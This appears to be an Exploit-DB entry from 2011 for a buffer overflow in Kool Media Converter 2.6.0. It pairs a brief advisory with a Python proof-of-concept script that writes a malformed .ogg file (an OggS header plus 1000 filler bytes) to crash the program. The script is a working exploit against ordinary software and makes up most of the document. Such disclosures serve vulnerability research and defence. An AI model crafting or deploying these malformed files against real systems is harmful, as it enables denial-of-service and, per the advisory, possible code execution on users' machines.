Kool Media Converter 2.6.0 - '.ogg' File Buffer Overflow

EDB-ID:

36300

CVE:

N/A


Author:

swami

Type:

dos


Platform:

Windows

Date:

2011-11-11


source: https://www.securityfocus.com/bid/50651/info

Kool Media Converter is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Kool Media Converter 2.6.0 is vulnerable; other versions may also be affected. 

#!/usr/bin/env python
#
#
# Exploit Title: Kool Media Converter v2.6.0 DOS
# Date: 10/10/2011
# Author: swami
# E-Mail: flavio[dot]baldassi[at]gmail[dot]com
# Software Link: http://www.bestwebsharing.com/downloads/kool-media-converter-setup.exe
# Version: 2.6.0
# Tested on: Windows XP SP3 ENG
#
#--- From Vendor Website
# Kool Media Converter is a sound tool addressed to casual listeners and fervent 
# audiophiles likewise. It deals with compatibility problems between your audio files 
# and the media player you are using to help you enjoy all the songs you love anyway you like.
#
#--- Description
# Kool Media Converter fails to handle a malformed .ogg file

ogg = b'\x4F\x67\x67\x53'		# Capture Pattern OggS in ascii
ogg += b'\x00'				# Version currently 0
ogg += b'\x02'		     		# Header Type of page that follows
ogg += b'\x00' * 8			# Granule Position
ogg += b'\xCE\xc6\x41\x49'		# Bitstream Serial Number
ogg += b'\x00' * 4 			# Page Sequence Number
ogg += b'\x70\x79\xf3\x3d'	     	# Checksum
ogg += b'\x01'		     		# Page Segment max 255
ogg += b'\x1e\x01\x76\x6f'		# Segment Table

ogg += b'\x41' * 1000

try:
	f = open('koolPoC.ogg','wb')
	f.write(ogg)
	f.close()
except:
	print('\nError while creating ogg file\n')